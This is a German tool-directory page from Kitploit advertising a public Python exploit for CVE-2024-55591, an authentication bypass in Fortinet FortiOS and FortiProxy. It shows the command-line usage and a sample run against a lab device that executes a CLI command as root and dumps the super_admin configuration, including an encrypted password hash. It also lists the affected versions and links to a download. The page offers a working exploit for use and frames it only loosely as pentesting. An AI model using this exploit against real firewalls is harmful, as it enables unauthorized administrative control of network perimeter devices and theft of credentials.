Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
fortios-auth-bypass-exploit-CVE-2024-55591 — Python-Exploit für CVE-2024-55591, das die FortiOS-Authentifizierung umgeht, um Remote-Befehle auf verwundbaren FortiGate- und FortiProxy-Geräten auszuführen. | Kitploit
Tools/GitHubGitHub/sysirq/fortios-auth-bypass-exploit-cve-2024-55591
Authentifizierung & AutorisierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsCommand and Control
GitHubsysirq/fortios-auth-bypass-exploit-cve-2024-55591

fortios-auth-bypass-exploit-CVE-2024-55591

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Python-Exploit für CVE-2024-55591, das die FortiOS-Authentifizierung umgeht, um Remote-Befehle auf verwundbaren FortiGate- und FortiProxy-Geräten auszuführen.

Repository anzeigen
34vor 1 JahrNoch nicht geprüft

CVE-2024-55591

Ein Exploit für die Fortinet-FortiOS-Authentifizierungs-Bypass-Sicherheitslücke

Beschreibung

Mit diesem Exploit können Sie die Authentifizierung umgehen und Befehle ausführen

Verwendung

root@kitploit:~
sysirq@sysirq-machine:~/Work/Fortinet/FortiGate_7_0_16/CVE-2024-55591$ python3 exp.py 
usage: exp.py [-h] --target TARGET [--port PORT] [--username USERNAME] [--cmd CMD]
exp.py: error: the following arguments are required: --target/-t

Demo

image-20250122220404985

image-20250122220502121

image-20250122220502121

Ausgabe

root@kitploit:~
sysirq@sysirq-machine:~/Work/Fortinet/FortiGate_7_0_16/CVE-2024-55591$ python3 exp.py -t 192.168.182.188 -p 443 -u admin -c 'show system admin'
CLI websocket initialized
\x00l_Process_Access" "Local_Process_Access" "root" "" ""  \x08"none" [192.168.182.1]:35950 [192.168.182.188]:443
Unknown action 0

FortiGate-VM64-KVM # 
wait for next action
CLI websocket initialized
\x00_Process_Access" "Local_Process_Access" "root" "" ""  \x08"none" [192.168.182.1]:40050 [192.168.182.188]:443
Unknown action 0

FortiGate-VM64-KVM # 
wait for next action
CLI websocket initialized
\x00 system admin
config system admin
    edit "admin"
        set accprofile "super_admin"
        set vdom "root"
        set password ENC SH2brnbwbooMvuSyHfEe82/cs0ehaIB2Kf06G/QYlI67PLGoEVKGJCGbYGqItg=
    next
end

Betroffene Versionen

  • FortiOS 7.0.0 bis 7.0.16
  • FortiProxy 7.0.0 bis 7.0.19
  • FortiProxy 7.2.0 bis 7.2.12
Tool herunterladen